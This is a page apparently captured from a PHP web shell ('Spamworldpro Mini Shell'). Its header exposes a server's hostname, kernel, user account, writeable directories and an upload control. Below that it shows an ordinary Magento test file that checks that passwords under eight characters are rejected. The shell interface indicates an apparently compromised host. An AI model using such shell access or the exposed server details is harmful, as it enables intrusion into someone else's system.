Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/module-security/Test/Mftf/Test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/module-security/Test/Mftf/Test/NewCustomerPasswordLengthTest.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
 /**
  * Copyright © Magento, Inc. All rights reserved.
  * See COPYING.txt for license details.
  */
-->

<tests xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:noNamespaceSchemaLocation="urn:magento:mftf:Test/etc/testSchema.xsd">
    <test name="NewCustomerPasswordLengthTest">
        <annotations>
            <features value="Security"/>
            <stories value="Checking customer's password length"/>
            <title value="Notify the customer if password length does not match the requirements"/>
            <description value="Notify the customer if password length does not match the requirements"/>
            <testCaseId value="MC-14367"/>
            <severity value="CRITICAL"/>
            <group value="security"/>
            <group value="mtf_migrated"/>
            <group value="pr_exclude"/>
        </annotations>

        <!-- Go to storefront home page -->
        <actionGroup ref="StorefrontOpenHomePageActionGroup" stepKey="openStoreFrontHomePage"/>

        <!-- See the Registration Link -->
        <actionGroup ref="StorefrontSeeHeaderLinksActionGroup" stepKey="seeTheLink"/>

        <!-- Click the Registration Link -->
        <actionGroup ref="StorefrontClickHeaderLinkActionGroup" stepKey="clickTheLink">
            <argument name="linkName" value="Create an Account"/>
        </actionGroup>

        <!-- Fill Registration Form with Password length is bellow 8 Characters -->
        <actionGroup ref="StorefrontFillCustomerAccountCreationFormActionGroup" stepKey="fillRegistrationFormPasswordLengthBellowEightCharacters">
            <argument name="customer" value="Simple_Customer_With_Password_Length_Is_Below_Eight_Characters"/>
        </actionGroup>

        <!-- See the Error -->
        <actionGroup ref="AssertMessageCustomerCreateAccountPasswordComplexityActionGroup" stepKey="seeTheErrorPasswordLength">
            <argument name="message" value="Minimum length of this field must be equal or greater than 8 symbols. Leading and trailing spaces will be ignored."/>
        </actionGroup>
    </test>
</tests>

Spamworldpro Mini